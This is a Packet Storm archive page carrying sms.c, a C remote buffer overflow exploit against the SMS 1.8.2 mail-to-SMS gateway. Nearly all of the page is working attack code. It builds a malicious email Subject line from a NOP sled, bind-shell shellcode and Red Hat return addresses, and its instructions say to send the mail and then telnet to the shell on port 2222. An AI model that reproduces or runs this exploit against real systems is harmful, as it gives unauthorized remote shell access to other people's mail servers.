what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sms.c

sms.c
Posted May 31, 2000
Authored by Venglin | Site b0f.freebsd.lublin.pl

sms.c is a remote SMS 1.8.2 (mail2sms gateway) long subject line remote buffer overflow exploit. Send the mail generated by this program and a shell will be listening on port 2222. Offsets adjusted for redhat.

tags | exploit, remote, overflow, shell
systems | linux, redhat
SHA-256 | 5263a1384cd6d126f626841f9e172551ca855196cc1ef2d42713cc721e51647b

sms.c

Change Mirror Download
/*
* sms, wersja: 1.8.2,
* Wysylanie wiadomosci na telefony sieci Era, Plus GSM i Idea Centertel.
*
* *REMOTE EXPLOIT*
*
* (c) 2000 babcia padlina / buffer0verfl0w security (b0f.freebsd.lublin.pl)
*
* Send mail generated by program. After successfull exploiting, telnet
* to port 2222.
*
* Sometimes adjusting parameter BUFSIZE may be useful. It depends on
* procmail script configuration.
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP 0x90
#define OFS 0
#define BUFSIZE 914
#define ADDRS 8
#define RET 0xbffff970 /* most redhat boxes */

char shell[] = /* duke bind shellcode */
"\xeb\x10\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xc3\x31\xc0\xb0\x01\xcd"
"\x80\xc3\xe8\xeb\xff\xff\xff\xb0\x06\xcd\x80\xb0\x06\xfe\xc3\xcd"
"\x80\xb0\x06\xfe\xc3\xcd\x80\xb0\x02\xcd\x80\x39\xc1\x75\xdc\xe8"
"\xce\xff\xff\xff\xb0\x02\xb1\x01\xb2\x06\x52\x51\x50\xb3\x01\xb0"
"\x66\x89\xe1\xcd\x80\x89\xc6\xe8\xb6\xff\xff\xff\x83\xc4\x12\x50"
"\xb9\x02\xff\x08\xae\x30\xed\x51\x89\xe2\x83\xec\x06\xb0\x10\x50"
"\xb3\x02\x52\x56\xb0\x66\x89\xe1\xcd\x80\xb0\x10\x50\x56\xb0\x66"
"\xb3\x04\x89\xe1\xcd\x80\xe8\x87\xff\xff\xff\x50\x50\x56\xb0\x66"
"\xb3\x05\x89\xe1\xcd\x80\x31\xc9\x88\xc3\xb0\x29\xcd\x80\xb0\x3f"
"\xcd\x80\xeb\x16\x5e\x88\x4e\x07\x89\x76\x08\x89\x4e\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe5\xff\xff\xff"
"/bin/sh";

int main(argc, argv)
int argc;
char **argv;
{
char *buf, *p;
int noplen, i, ofs;
long ret, *ap;

if(!(buf = (char *)malloc(BUFSIZE+ADDRS+10)))
{
perror("malloc()");
return -1;
}

if (argc > 1)
ofs = atoi(argv[1]);
else
ofs = OFS;

ret = RET + ofs;

noplen = BUFSIZE - strlen(shell);

memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, shell);

p = buf + noplen + strlen(shell);
ap = (unsigned long *)p;

for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;

p = (char *)ap;
*p = '\0';

fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf));

printf("Return-Path: @\n");
printf("Subject: %s\n\n", buf);

return 0;
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close